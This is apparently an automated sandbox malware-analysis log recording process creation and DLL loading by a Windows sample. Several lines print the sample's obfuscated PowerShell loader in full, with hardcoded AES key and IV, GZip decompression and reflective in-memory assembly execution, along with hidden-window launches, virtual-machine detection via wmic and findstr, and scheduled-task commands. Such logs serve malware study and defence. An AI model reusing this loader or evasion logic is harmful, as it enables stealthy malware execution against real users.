break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
